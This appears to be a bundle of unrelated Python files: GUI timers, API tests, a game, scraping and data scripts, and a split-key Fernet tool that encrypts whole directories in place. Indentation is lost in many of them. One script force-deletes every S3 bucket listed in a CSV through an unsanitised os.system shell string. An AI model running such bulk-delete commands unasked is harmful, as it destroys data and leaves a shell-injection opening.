from pymouse import PyMouse
from pykeyboard import PyKeyboard
class ScreenSaverPreventer(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self)
self.key = PyKeyboard()
def doSomething(self):
self.key.press_key(self.key.control_l_key)
self.key.release_key(self.key.control_l_key)
def run(self):
self.timer = QtCore.QTimer(self)
self.timer.timeout.connect(self.doSomething)
self.timer.start(59000) # 59 sec
def stop(self):
self.timer.stop()
class TimerWindow(QtGui.QWidget):
def __init__(self, parent=None):
super(TimerWindow, self).__init__(parent)
self.label = QtGui.QLabel()
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
font=QtGui.QFont()
font.setPixelSize(60)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.stopButton = QtGui.QPushButton("&Stop")
self.stopButton.setFixedWidth(60)
self.stopButton.setStyleSheet("margin-bottom: 10px;padding: 4px;")
self.stopButton.clicked.connect(self.stop)
layout = QtGui.QVBoxLayout()
layout.addWidget(self.label)
layout.addWidget(self.stopButton, alignment=QtCore.Qt.AlignHCenter)
self.setLayout(layout)
self.resize(400, 400)
self.screen_saver_preventer=ScreenSaverPreventer()
def run(self, sec, countdown3):
self.sec = sec
self.countdownConfig = countdown3
self.countdown3Init()
self.timer = QtCore.QTimer(self)
self.timer.timeout.connect(self.update)
self.timer.start(1001) # Magic number
self.screen_saver_preventer.run()
def stop(self):
self.timer.stop()
self.config_window = ConfigWindow()
self.config_window.move(self.pos())
self.config_window.show()
self.screen_saver_preventer.stop()
self.close()
def mainUpdateInit(self):
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#49f;}\
TimerWindow {background-color:#fff; border-bottom:10px solid #49f}\
QLabel {color:#777;}")
self.now = self.sec
self.mode = 'mainCountdown'
self.update()
def update(self):
self.label.setText(str(self.now))
self.now -= 1
if self.now == -1: # When Time's up
if (self.mode == 'countdown3' or # If currently is counting 3 sec
self.countdownConfig == False): # If user set not countdown 3 sec
self.mainUpdateInit()
else:
self.countdown3Init()
if self.mode == 'mainCountdown':
if self.now == 60:
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#af0;}\
TimerWindow {background-color:#af0;}\
QLabel {color:#fff;}")
elif self.now == 29:
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#49f;}\
TimerWindow {background-color:#49f;}\
QLabel {color:#fff;}")
elif self.now == 19:
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#fa0;}\
TimerWindow {background-color:#fa0;}\
QLabel {color:#fff;}")
elif self.now == 9:
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#f00;}\
TimerWindow {background-color:#f00;}\
QLabel {color:#fff;}")
elif self.now == 2:
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#700;}\
TimerWindow {background-color:#700}\
QLabel {color:#fff;}")
def countdown3Init(self):
self.setStyleSheet("background-color:#222;color:#eee;")
self.mode = 'countdown3'
self.now = 3
self.countdown3()
def countdown3(self):
self.label.setText(str(self.now))
self.now -= 1
if self.now == -1:
# Call main loop
self.update()
class ConfigWindow(QtGui.QWidget):
def __init__(self, parent=None):
super(ConfigWindow, self).__init__(parent)
layout = QtGui.QGridLayout()
self.radio_buttons = QtGui.QButtonGroup(parent)
r10 = QtGui.QRadioButton("&10 Sec")
r15 = QtGui.QRadioButton("1&5 Sec")
r30 = QtGui.QRadioButton("&30 Sec")
r45 = QtGui.QRadioButton("&45 Sec")
r60 = QtGui.QRadioButton("&60 Sec")
r90 = QtGui.QRadioButton("&90 Sec")
self.radio_buttons.addButton(r10)
self.radio_buttons.addButton(r15)
self.radio_buttons.addButton(r30)
self.radio_buttons.addButton(r45)
self.radio_buttons.addButton(r60)
self.radio_buttons.addButton(r90)
layout.addWidget(r10, 0, 0)
layout.addWidget(r15, 0, 1)
layout.addWidget(r30, 0, 2)
layout.addWidget(r45, 1, 0)
layout.addWidget(r60, 1, 1)
layout.addWidget(r90, 1, 2)
r30.setChecked(True)
self.countdownConfig = QtGui.QCheckBox("&Countdown")
layout.addWidget(self.countdownConfig, 2, 0, 1, 3)
startButton = QtGui.QPushButton("&Start")
layout.addWidget(startButton, 3, 2)
startButton.clicked.connect(self.positionSelector)
startButton.setDefault(True)
quitButton = QtGui.QPushButton("&Quit")
layout.addWidget(quitButton, 3, 0)
quitButton.clicked.connect(self.close)
self.setWindowTitle("Posemaniac Timer")
self.setLayout(layout)
self.setStyleSheet('''
background-color: #fff;
color: #666;
''')
desktop = QtGui.QApplication.desktop()
        self.move(int(desktop.width() / 2 - self.width() * 0.2),
                  int(desktop.height() / 2 - self.height() * 0.2))
def positionSelector(self):
r = self.radio_buttons.checkedId()
if r == -2:
sec = 10
elif r == -3:
sec = 15
elif r == -4:
sec = 30
elif r == -5:
sec = 45
elif r == -6:
sec = 60
elif r == -7:
sec = 90
if self.countdownConfig.checkState() == 2:
countdown3 = True
else:
countdown3 = False
self.position_selection_ui = PositionSelectionUI(sec, countdown3, self.pos())
        self.close()  # not entirely sure whether this could cause problems
class PositionSelectionUI (QtGui.QWidget):
def __init__ (self, sec, countdown3, configWindowPos, parent = None):
self.sec = sec
self.countdownConfig = countdown3
# Create TimerWindow Instance
self.timer_window = TimerWindow()
self.timer_window.move(configWindowPos)
super(PositionSelectionUI, self).__init__(parent)
self.setWindowOpacity(0.7)
self.setStyleSheet("background-color:rgba(0,0,0,180)")
# Init QLabel
self.label = PositionSelectionUILabel(self)
# Init QLayout
layout = QtGui.QHBoxLayout()
layout.addWidget(self.label)
layout.setMargin(0)
layout.setSpacing(0)
self.setLayout(layout)
self.show()
self.showFullScreen()
def callTimerAndRun(self):
# parent is ConfigWindow
self.timer_window.show()
# this will remove minimized status
# and restore window with keeping maximized/normal state
self.timer_window.setWindowState(self.timer_window.windowState() & ~QtCore.Qt.WindowMinimized | QtCore.Qt.WindowActive)
# this will activate the window
self.timer_window.activateWindow()
self.timer_window.run(self.sec, self.countdownConfig)
self.close()
class PositionSelectionUILabel (QtGui.QLabel):
def __init__ (self, parent = None):
super(PositionSelectionUILabel, self).__init__(parent)
self.parent = parent
self.setMouseTracking(True)
self.setTextLabelPosition(0, 0)
self.setAlignment(QtCore.Qt.AlignCenter)
def mouseMoveEvent (self, event):
self.setTextLabelPosition(event.x(), event.y())
QtGui.QWidget.mouseMoveEvent(self, event)
def mousePressEvent (self, event):
if event.button() == QtCore.Qt.LeftButton:
self.parent.hide()
pos=event.pos()
mouse = PyMouse()
time.sleep(0.2)
mouse.click(pos.x(), pos.y())
# parent is PositionSelectionUI
self.parent.callTimerAndRun()
self.parent.timer_window.move(pos.x() + 320, pos.y() - 380)
QtGui.QWidget.mousePressEvent(self, event)
def setTextLabelPosition (self, x, y):
self.x, self.y = x, y
self.setText('Please click at START button on Posemaniacs page. ( %d : %d )' % (self.x, self.y))
app = QtGui.QApplication(sys.argv)
config_window = ConfigWindow()
config_window.show()
app.exec_()
|
__author__ = "Narwhale"
s = "ajldjlajfdljddd"
s = set(s)
s = list(s)
s.sort(reverse=False)
res = ''.join(s)
print(res)
|
#!/usr/bin/env python
import Tkinter
root = Tkinter.Tk()
canvas = Tkinter.Canvas(root, width=300, height=200)
canvas.pack()
canvas.create_rectangle(50, 50, 150, 100, fill="yellow")
#canvas.create_oval(5, 5, 300, 200, fill="green")
#canvas.create_text(150, 100, text="Amazing!", fill="purple", font="Helvetica 26 bold underline")
root.mainloop()
|
import pytest
from openapi_spec_validator import validate_spec
from apiflask import Schema as BaseSchema
from apiflask.fields import Integer
from apiflask import input
from apiflask import output
from apiflask import doc
from .schemas import FooSchema
from .schemas import BarSchema
from .schemas import BazSchema
def test_spec(app):
assert app.spec
assert 'openapi' in app.spec
def test_spec_processor(app, client):
@app.spec_processor
def edit_spec(spec):
assert spec['openapi'] == '3.0.3'
spec['openapi'] = '3.0.2'
assert app.title == 'APIFlask'
assert spec['info']['title'] == 'APIFlask'
spec['info']['title'] = 'Foo'
return spec
rv = client.get('/openapi.json')
assert rv.status_code == 200
validate_spec(rv.json)
assert rv.json['openapi'] == '3.0.2'
assert rv.json['info']['title'] == 'Foo'
@pytest.mark.parametrize('spec_format', ['json', 'yaml', 'yml'])
def test_get_spec(app, spec_format):
spec = app.get_spec(spec_format)
if spec_format == 'json':
assert isinstance(spec, dict)
else:
assert 'title: APIFlask' in spec
def test_spec_schemas(app):
@app.route('/foo')
@output(FooSchema(partial=True))
def foo():
pass
@app.route('/bar')
@output(BarSchema(many=True))
def bar():
pass
@app.route('/baz')
@output(BazSchema)
def baz():
pass
class Spam(BaseSchema):
id = Integer()
@app.route('/spam')
@output(Spam)
def spam():
pass
class Schema(BaseSchema):
id = Integer()
@app.route('/schema')
@output(Schema)
def schema():
pass
with app.app_context():
spec = app.spec
assert len(spec['components']['schemas']) == 5
assert 'FooUpdate' in spec['components']['schemas']
assert 'Bar' in spec['components']['schemas']
assert 'Baz' in spec['components']['schemas']
assert 'Spam' in spec['components']['schemas']
assert 'Schema' in spec['components']['schemas']
def test_servers_and_externaldocs(app):
assert app.external_docs is None
assert app.servers is None
app.external_docs = {
'description': 'Find more info here',
'url': 'https://docs.example.com/'
}
app.servers = [
{
'url': 'http://localhost:5000/',
'description': 'Development server'
},
{
'url': 'https://api.example.com/',
'description': 'Production server'
}
]
rv = app.test_client().get('/openapi.json')
assert rv.status_code == 200
validate_spec(rv.json)
assert rv.json['externalDocs'] == {
'description': 'Find more info here',
'url': 'https://docs.example.com/'
}
assert rv.json['servers'] == [
{
'url': 'http://localhost:5000/',
'description': 'Development server'
},
{
'url': 'https://api.example.com/',
'description': 'Production server'
}
]
def test_auto_200_response(app, client):
@app.get('/foo')
def bare():
pass
@app.get('/bar')
@input(FooSchema)
def only_input():
pass
@app.get('/baz')
@doc(summary='some summary')
def only_doc():
pass
@app.get('/eggs')
@output(FooSchema, 204)
def output_204():
pass
@app.get('/spam')
@doc(responses={204: 'empty'})
def doc_responses():
pass
rv = client.get('/openapi.json')
assert rv.status_code == 200
validate_spec(rv.json)
assert '200' in rv.json['paths']['/foo']['get']['responses']
assert '200' in rv.json['paths']['/bar']['get']['responses']
assert '200' in rv.json['paths']['/baz']['get']['responses']
assert '200' not in rv.json['paths']['/eggs']['get']['responses']
assert '200' not in rv.json['paths']['/spam']['get']['responses']
assert rv.json['paths']['/spam']['get']['responses'][
'204']['description'] == 'empty'
|
number = int(input("Give me a number to return its divisors: "))
divisors = []
for i in range(1, number + 1):  # the original capped candidates at 99, missing larger divisors
    if number % i == 0:
        divisors.append(i)
print(divisors)
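# For large inputs, scanning only up to the square root and recording each
# divisor together with its complement is much faster (a sketch; math.isqrt
# requires Python 3.8+):
# import math
# found = set()
# for i in range(1, math.isqrt(number) + 1):
#     if number % i == 0:
#         found.update((i, number // i))
# print(sorted(found))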
|
print('hello')
# thank you
|
from flask_api import status
from tests.base_login_test_case import BaseLoginTestCase
from tests.base_photo_test_case import BasePhotoTestCase
class ResizedTestCase(BasePhotoTestCase, BaseLoginTestCase):
"""
Tests the route for resizing images.
"""
def test_route(self):
"""
Tests the route is working.
"""
length = 200
self.photo.thumbnail(length, length)
response = self.client.get(f'/resized-images/{length}_{length}_{self.photo.filename}')
self.assertEqual(status.HTTP_200_OK, response.status_code, msg=response)
|
import logging
import configparser
import os
import time
from selenium import webdriver
from gui import *
from math import ceil
from threading import Thread
# from selenium.webdriver.common.keys import Keys
# from selenium.webdriver.chrome.options import Options
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
fh = logging.FileHandler("logs.log", 'w', encoding="utf-8",)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
log.addHandler(fh)
driverpath = f'{os.getcwd()}\\geckodriver.exe'
class BrowserThread(Thread):
def __init__(self):
Thread.__init__(self)
self.start()
def run(self):
driver.maximize_window()
driver.implicitly_wait(30)
login()
while True:
if active[0] and frames:
editcamps()
def login():
config = configparser.ConfigParser()
if os.path.isfile('config.ini'):
config.read('config.ini')
login = config['Admin']['Login']
password = config['Admin']['Pass']
else:
log.critical('Config file (config.ini) not found')
log.info('Opening main page...')
driver.get('https://megapu.sh/?a=campaigns&f=stop')
log.info('Done')
input_login = driver.find_element_by_id('login')
input_pass = driver.find_element_by_id('password')
input_login.send_keys(login)
input_pass.send_keys(password)
    input()  # pause here (presumably for manual login/captcha confirmation) before continuing
driver.get('https://megapu.sh/?a=campaigns&f=stop')
def editcamps():
pages = ceil(int(driver.find_element_by_class_name('counter-stop').text) / 25) #counter-running
for frame in frames:
log.debug('Checking frame...')
if frame['id'].get() != '0':
for page in range(pages):
driver.get(f'https://megapu.sh/?a=campaigns&f=stop&camp_id={frame["id"].get()}&action=edit&page={page}')
time.sleep(3)
                log.debug('Searching for camp id...')
if driver.find_element_by_id('camp_id').text == frame['id'].get():
log.debug(f'Found {frame["id"].get()}')
break
if __name__ == '__main__':
driver = webdriver.Firefox(executable_path=driverpath)
browser = BrowserThread()
root.mainloop()
|
import os
import csv
from itertools import chain
with open('buckets.csv', 'r') as f:
reader = csv.reader(f)
s3_buckets = list(reader)
for buckets in s3_buckets:
for bucket in buckets:
os.system(f"aws s3 rb {bucket} --force")
|
"""This program plays a game of Rock, Paper, Scissors between two Players,
and reports both Player's scores each round."""
import random
moves = ['rock', 'paper', 'scissors']
"""The Player class is the parent class for all of the Players
in this game"""
class Player:
def move(self):
return 'rock'
def learn(self, my_move, their_move):
pass
# beats() lives at module level so that Game.play_round below can call it
# directly.
def beats(one, two):
    return ((one == 'rock' and two == 'scissors') or
            (one == 'scissors' and two == 'paper') or
            (one == 'paper' and two == 'rock'))
class RandomPlayer(Player):
def move(self):
move_to_play = random.randrange(3)
return moves[move_to_play]
def learn(self, my_move, their_move):
pass
class ReflectPlayer(Player):
def __init__(self):
self.last_move = "none"
def move(self):
if self.last_move == "none":
move_to_play = random.randrange(3)
return moves[move_to_play]
else:
return self.last_move
def learn(self, my_move, their_move):
self.last_move = their_move
#https://docs.python.org/3.4/library/itertools.html
class CyclePlayer(Player):
def __init__(self):
self.cycle = 0
def move(self):
if self.cycle == 0:
self.cycle += 1
return moves[0]
elif self.cycle == 1:
self.cycle += 1
return moves[1]
elif self.cycle == 2:
self.cycle = 0
return moves[2]
def learn(self, my_move, their_move):
pass
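# Note: per the itertools docs linked above, CyclePlayer's bookkeeping could be
# replaced by holding itertools.cycle(moves) and returning next(...) from
# move(); the explicit counter is kept here for readability.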
class HumanPlayer(Player):
def move(self):
throw = input('rock, paper, scissors?')
while throw != 'rock' and throw != 'paper' and throw != 'scissors':
print('Invalid choice. Please try again.')
throw = input('rock, paper, scissors?')
return(throw)
class Game:
def __init__(self, p1, p2):
self.p1 = p1
self.p2 = p2
self.p1_score = 0
self.p2_score = 0
def play_round(self):
move1 = self.p1.move()
move2 = self.p2.move()
winning_player = None
winner = beats(move1, move2)
if move1 == move2:
print("DRAW!")
return [self.p1_score, self.p2_score]
if winner:
winning_player = "p1"
self.p1_score += 1
else:
winning_player = "p2"
self.p2_score += 1
print(f"Player 1: {move1} Player 2: {move2}")
print("Winner : ", winning_player)
print("p1Pts:" + str(self.p1_score) + "|p2Pts:" + str(self.p2_score))
self.p1.learn(move1, move2)
self.p2.learn(move2, move1)
return [self.p1_score, self.p2_score]
def play_game(self):
print("Game start!")
for round in range(3):
print(f"Round {round}:")
scores = self.play_round()
print("Game over!")
if scores[0] > scores[1]:
winner = "Player 1"
elif scores[0] < scores[1]:
winner = "Player 2"
        else:
winner = "DRAW!"
print("p1 score:" + str(scores[0]))
print("| p2 score:" + str(scores[1]))
print("WINNER: " + winner)
if __name__ == '__main__':
game = Game(ReflectPlayer(), HumanPlayer())
game.play_game()
|
import json
import csv
import requests
import DiscoveryDetails as dt
output_file = open("./training_file.tsv", "w")
writer = csv.writer(output_file, delimiter="\t")
try:
with open ("./Questions.txt", encoding="Windows 1252") as questions:
noOfQuestions = 0
for line in questions:
print("Question No = " + str(noOfQuestions + 1))
question = line.replace("\n", "")
print("Question = " + question)
question = "%s" % (question)
#run Discovery query to get results from untrained service
result = dt.discovery.query(environment_id=dt.environment_id, collection_id=dt.collection_id, deduplicate=False, highlight=True, passages=True, passages_count=5, natural_language_query=question, count=5)
#print("Query Response = " + json.dumps(result.get_result()))
#create a row for each query and results
result_list = [question]
for resultDoc in result.get_result()["results"]:
id = resultDoc["id"]
text = resultDoc["text"]
#for resultDoc in result.get_result()["passages"]:
#id = resultDoc["document_id"]
#text = resultDoc["passage_text"]
if( len(text) > 1000 ):
text = text[:1000]
result_list.extend([id,text,' ']) #leave a space to enter a relevance label for each doc
#write the row to the file
writer.writerow(result_list)
noOfQuestions = noOfQuestions + 1
print("==========================================================")
print("")
print("tsv file with questions and query results created")
print("Number of questions processed = " + str(noOfQuestions))
output_file.close()
except Exception as e:
print("Exception occurred ####### ")
print(e)
|
import pygame
from view.game_view import GameView
from model.game_model import GameModel
from controller.player_input import player_input
from controller.enemy_input import enemy_input
from model.vehicle_handling.spawn_enemies import spawn_chance
import time
def p1_start(window):
game_view = GameView(window)
game_model = GameModel()
has_not_quit_game = True
while has_not_quit_game:
events = pygame.event.get()
spawn_chance(game_model.vehicles)
has_not_quit_game = player_input(game_model.player, events)
enemy_input(game_model.vehicles)
game_model.update()
game_view.update(game_model.vehicles)
if not game_model.check_if_player_is_alive(game_model.player):
time.sleep(2.2)
break
# print(window.clock.get_fps())
window.clock.tick(120)
|
'''
66. Plus One
Given a non-empty array of decimal digits representing a non-negative integer, add one to the integer.
The digits are stored such that the most significant digit is at the head of the list, and each element in the array contains a single digit.
You may assume the integer does not contain any leading zero, except the number 0 itself.
Example 1:
Input: digits = [1,2,3]
Output: [1,2,4]
Explanation: The array represents the integer 123.
Example 2:
Input: digits = [4,3,2,1]
Output: [4,3,2,2]
Explanation: The array represents the integer 4321.
Example 3:
Input: digits = [0]
Output: [1]
'''
class Solution:
def plusOne(self, digits):
digits = digits[::-1]
finished = False
i = 0
while not finished:
if i < len(digits):
if digits[i] == 9:
digits[i] = 0
else:
digits[i] += 1
finished = True
else:
digits.append(1)
finished = True
i += 1
return digits[::-1]
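# A quick usage sketch mirroring the examples above:
if __name__ == '__main__':
    s = Solution()
    assert s.plusOne([1, 2, 3]) == [1, 2, 4]
    assert s.plusOne([9, 9]) == [1, 0, 0]
    print('plusOne examples pass')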
|
from cryptography.fernet import Fernet
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
import codecs
import os
import sys
def my_xor(x, y):
    """
    XOR of x and y, which are both integers.
    """
    return (x | y) & (~x | ~y)
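# Note: (x | y) & (~x | ~y) is the De Morgan expansion of XOR, so
# my_xor(a, b) == a ^ b for all integers (e.g. my_xor(0b1100, 0b1010) == 0b0110).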
def generate_fernet_key_file(path_cle, nom_cle, path_sd):
    """
    Creates the files holding the key fragments and the file holding the real key's SHA256 hash.
    :param path_cle: path of the key on the PC
    :param nom_cle: file name of the key, including its extension
    :param path_sd: path of the key on the SD card
    :return: True on success, False when the CID cannot be read
    """
    try:
        cid = str(find_cid(path_sd)).replace("\\x", "")[2:-1]
    except Exception:
        return False  # CID could not be read; signal failure to callers
    key_pc = str(Fernet.generate_key()).replace("-", "+").replace("_", "/")[2:-1].encode()
    with open(path_cle + nom_cle, "wb") as key_file:
        key_file.write(key_pc)
    key_sd = str(Fernet.generate_key()).replace("-", "+").replace("_", "/")[2:-1].encode()
    with open(path_sd + nom_cle, "wb") as key_file:
        key_file.write(key_sd)
master_key_hex = generate_master_key_hex(key_pc, key_sd, cid)
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(master_key_hex.encode())
master_digest = digest.finalize()
with open(path_cle + "Master_" + nom_cle, "wb")as key_file:
key_file.write(master_digest)
def generate_master_key_hex(key_pc, key_sd, cid):
    """
    Hex-encodes the key fragments so they can be XORed, and returns the real key in hexadecimal.
    """
key_pc_hex = codecs.encode(codecs.decode(key_pc, 'base64'), 'hex').decode()
key_sd_hex = codecs.encode(codecs.decode(key_sd, 'base64'), 'hex').decode()
master_key = my_xor(my_xor(int(key_pc_hex, 16), int(cid, 16)), int(key_sd_hex, 16))
master_key_hex = str(hex(master_key))[2:]
if len(master_key_hex) < len(key_pc_hex):
master_key_hex = "0" + master_key_hex
return master_key_hex
def create_master_key_hex(path_cle, nom_cle, path_sd):
    """
    Builds the key in hexadecimal.
    """
with open(path_cle + nom_cle, "rb")as key_file:
key_pc = key_file.read()
with open(path_sd + nom_cle, "rb")as key_file:
key_sd = key_file.read()
try:
cid = str(find_cid(path_sd)).replace("\\x", "")[2:-1]
except Exception as e:
raise e
master_key_hex = generate_master_key_hex(key_pc, key_sd, cid)
return master_key_hex
def create_master_key(path_cle, nom_cle, path_sd):
    """
    Builds the key in url-safe base64.
    This is the function used to create the key that works with the encrypt and decrypt functions.
    :param path_cle: path of the key on the PC
    :param nom_cle: file name of the key, including its extension
    :param path_sd: path of the key on the SD card
    :return: the real key in url-safe base64
    """
master_key_hex = create_master_key_hex(path_cle, nom_cle, path_sd)
master_key = codecs.encode(codecs.decode(master_key_hex, 'hex'), 'base64').decode()
return master_key.replace("+", "-").replace("/", "_")[:-1].encode()
def check_keys(path_cle, nom_cle, path_sd):
    """
    Assembles the key fragments, opens the SHA256 file and compares the values.
    :param path_cle: path of the key on the PC
    :param nom_cle: file name of the key, including its extension
    :param path_sd: path of the key on the SD card
    :return: True if the SHA256 indeed matches this key, False otherwise
    """
try:
master_key_hex = create_master_key_hex(path_cle, nom_cle, path_sd)
except Exception as e:
print("Problème de CID")
return False
with open(path_cle + "Master_" + nom_cle, "rb")as key_file:
master_digest = key_file.read()
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(master_key_hex.encode())
if digest.finalize() == master_digest:
return True
else:
return False
def encode_fernet(key, message):
    """
    Encrypts a message.
    :param key: key produced by the create_master_key function
    :param message: message to encrypt
    :return: the encrypted token
    """
fernet_key = Fernet(key)
token = fernet_key.encrypt(message)
return token
def decode_fernet(key, token):
    """
    Decrypts a message.
    :param key: key produced by the create_master_key function
    :param token: message to decrypt
    :return: the decrypted message
    """
fernet_key = Fernet(key)
message = fernet_key.decrypt(token)
return message
def encrypt_file_fernet(key, path):
    """
    Encrypts a file in place.
    :param key: key produced by the create_master_key function
    :param path: path of the file to encrypt
    :return: None
    """
with open(path, "rb") as file_read:
message = file_read.read()
pass_encrypt = encode_fernet(key, message)
with open(path, "wb") as file_write:
file_write.write(pass_encrypt)
def decrypt_file_fernet(key, path):
    """
    Decrypts a file in place.
    :param key: key produced by the create_master_key function
    :param path: path of the file to decrypt
    :return: None
    """
with open(path, "rb") as file_read:
token = file_read.read()
pass_decrypt = decode_fernet(key, token)
with open(path, "wb") as file_write:
file_write.write(pass_decrypt)
def encrypt_directory_fernet(key, path):
    """
    Recursively encrypts a whole directory.
    :param key: key produced by the create_master_key function
    :param path: path of the directory to encrypt
    :return: None
    """
for paths, dirs, files in os.walk(path):
for filename in files:
encrypt_file_fernet(key, paths + os.sep + filename)
def decrypt_directory_fernet(key, path):
    """
    Recursively decrypts a whole directory.
    :param key: key produced by the create_master_key function
    :param path: path of the directory to decrypt
    :return: None
    """
for paths, dirs, files in os.walk(path):
for filename in files:
decrypt_file_fernet(key, paths + os.sep + filename)
def find_cid(path):
    """
    Finds the CID of the SD card.
    """
cid = ""
if sys.platform == "win32":
try:
f = open("\\\\.\\"+path[:-1], 'rb')
            cid = f.read(43)[39:]  # Volume ID in the Windows case
except Exception as e:
print(path[:-1])
raise e
elif sys.platform == "linux":
try:
f = open("/sys/block/" + str(path) + "device/cid", 'rb')
cid = f.read()
except Exception as e:
return e
return bytes(cid)
""" EXEMPLE """
def testcreer():
path = "prout"
path_cle = ""
nom_cle = "cleSD.txt"
if not generate_fernet_key_file(path_cle, nom_cle, "H:" + os.sep):
print("Problème de CID, rien n'est généré")
return
key = create_master_key(path_cle, nom_cle, "H:\\")
encrypt_directory_fernet(key, path)
def testdecrypt():
path = "prout"
path_cle = ""
nom_cle = "cleSD.txt"
key = create_master_key(path_cle, nom_cle, "H:\\")
decrypt_directory_fernet(key, path)
|
from DeepLearning.Layers.Affine import *
from DeepLearning.Layers.Add import *
from DeepLearning.Layers.MulLayer import *
from DeepLearning.Layers.ReluLayer import *
from DeepLearning.Layers.SigmoidLayer import *
from DeepLearning.Layers.SoftmaxWithLossLayer import *
|
# -*- coding:utf-8 -*-
'''
Created on 24 March 2016
@author: huke
'''
def Cycle():
L = ['Bart', 'Lisa', 'Adam']
for x in L:
print(x)
def Cycle2():
s = 0
for x in range(101):
s += x
print(s)
if __name__ == '__main__':
Cycle()
Cycle2()
    input()  # pause so the console window stays open
|
# __author__ = 'azhukov'
# import cProfile
# import random
#
# from py_skiplist.skiplist import Skiplist
# from py_skiplist.iterators import geometric
from bintrees import RBTree
#
# DATA_SET = [random.randint(1, 10**3) for i in range(100000)]
# READ_INPUT = [random.randint(1, 10**3) for j in range(1)]
#
# def run_skiplist_test():
# sl = Skiplist()
# for c in DATA_SET:
# sl._insert(c, c)
# # print sum(len(node.nxt) for node in sl._level(level=0))
# # print [len(node.nxt) for node in sl._level(level=0)]
# # g = geometric(0.5)
# # print [next(g) for _ in range(200)]
# return sl
#
# sl = run_skiplist_test()
# # print sum(len(node.nxt) for node in sl._level(level=0))
# print [len(node.nxt) for node in sl._level(level=0)]
# # g = geometric(0.5)
# print [next(sl.distribution) +1 for _ in range(200)]
#
#
# def sl_read():
# for j in READ_INPUT:
# sl.get(i)
# # print sl.n, sl.nc, ncals
# # print sum(len(node.nxt) for node in sl._level())
#
# def run_rbtree_test():
# tree = RBTree()
# for i in DATA_SET:
# tree[str(i)] = i
# return tree
#
# tree = run_rbtree_test()
#
# def tree_read():
# for k in READ_INPUT:
# tree.get(k)
#
# # cProfile.run('sl._insert(5000, 30)')
# cProfile.run('run_skiplist_test()')
# cProfile.run('run_rbtree_test()')
# # cProfile.run('sl_read()')
# # cProfile.run('tree_read()')
#
# from pycallgraph import PyCallGraph
# from pycallgraph.output import GraphvizOutput
#
# # with PyCallGraph(output=GraphvizOutput()):
# # run_skiplist_test()
|
class Record(bytearray):
"""
Unit of physical stored information in the database
"""
def __init__(self, data: bytes, index: int = 0):
"""
Creates new record object from initial bytes of data.
:param data: initial bytes.
:param index: physical index of record in the storage.
"""
super().__init__(data)
self.idx = index
self.size = len(data)
@classmethod
def empty(cls, size: int, index: int = 0) -> 'Record':
"""
Creates empty record filled with zeroes.
:param size: size of empty record.
:param index: physical index of record in the storage.
:return: new record object.
"""
return Record(b'\0' * size, index)
def override(self, offset: int, data: bytes) -> None:
"""
Overrides subset of bytes of record data.
:param offset: starting position of new data
:param data: data to be written
:return: None
"""
assert offset + len(data) <= self.size
self[offset:offset + len(data)] = data
def set_index(self, index: int):
self.idx = index
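# A minimal usage sketch (values are illustrative):
if __name__ == '__main__':
    rec = Record.empty(16, index=3)
    rec.override(4, b'\xde\xad\xbe\xef')
    assert rec[4:8] == b'\xde\xad\xbe\xef'
    assert rec.idx == 3 and rec.size == 16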
|
import os
import requests
import collections
import re
import sys
import numpy as np
class ReadForexData:
"""read the up-to-date forex data via oanda API"""
def __init__(self, parameter_dict):
self.mode = parameter_dict['mode']
self.instruments_list = ['EUR_USD', 'USD_JPY', 'USD_CAD', 'GBP_USD', 'USD_CHF','AUD_USD']
self.instrument = parameter_dict['instrument']
self.granularity = parameter_dict['granularity']
self.candle_format = parameter_dict['candle_format']
self.date_range = parameter_dict['date_range']
self.time_zone = parameter_dict['alignmentTimezone']
self.file_path = parameter_dict['file_path']
self.output_attributors_str = parameter_dict['output_attributors_str']
# reference:
# http://developer.oanda.com/docs/timezones.txt
self.url = "https://api-fxtrade.oanda.com/v1/candles?" \
"instrument={instrument}&" \
"count={date_range}&" \
"candleFormat={candle_format}&" \
"granularity={granularity}&" \
"dailyAlignment=0&" \
"alignmentTimezone={time_zone}".format(instrument = self.instrument,
date_range = self.date_range,
candle_format = self.candle_format,
granularity = self.granularity,
time_zone = self.time_zone)
self.forex_data_dict = collections.defaultdict(lambda :[])
def write_forex_dict_to_file(self):
path = self.file_path
#self.forex_data_dict : {'EUR_USD':[('AUD_USD', '2014-9-9', 0.77157, 0.772, 0.767955, 0.76851, 0.76, 0.11, 0.14), ...]}
with open (path, 'w', encoding = 'utf-8') as f:
f.write("{}\n".format(self.output_attributors_str))
for instrument, days_feature_list in self.forex_data_dict.items():
for i, day_features in enumerate(days_feature_list):
day_features = [str(x) for x in day_features]
feature_str = ','.join(day_features)
                f.write(feature_str)
                if i != len(days_feature_list) - 1:
                    f.write('\n')
#['_', 'AUD_USD', '02/21/2017', '-0.12', '0.1', '-0.2', '0.31', '6162', '26.63',
# '0.4', '1.8', '1.8', '3.2', '0.48', '0.64', '0.84', '-0.047', '-0.238', '-0.471\
# n']
def get_data_distribution(self, file_path):
feature_all_value_dict = collections.defaultdict(lambda:[])
feature_value_distribution_dict = collections.defaultdict(lambda:[])
with open(file_path, 'r', encoding = 'utf-8') as f:
for line in (f):
feature_list = line.split(',')
for i, feature in enumerate(feature_list):
if i < 3:
continue
feature_all_value_dict[i].append(float(feature.strip()))
# compute max, min, etc
for feature_id, feature_value_list in feature_all_value_dict.items():
max_value = max(feature_value_list)
min_value = min(feature_value_list)
zero_list = [0 for x in feature_value_list if x == 0]
# pos
pos_feature_value_list = [x for x in feature_value_list if x > 0]
if len(pos_feature_value_list) > 0:
pos_average = sum(pos_feature_value_list) / len(pos_feature_value_list)
else:
pos_average = 0
# neg
neg_feature_value_list = [x for x in feature_value_list if x < 0]
if len(neg_feature_value_list) > 0:
neg_average = sum(neg_feature_value_list) / len(neg_feature_value_list)
else:
neg_average = 0
# zero_num
zero_num = len(zero_list)
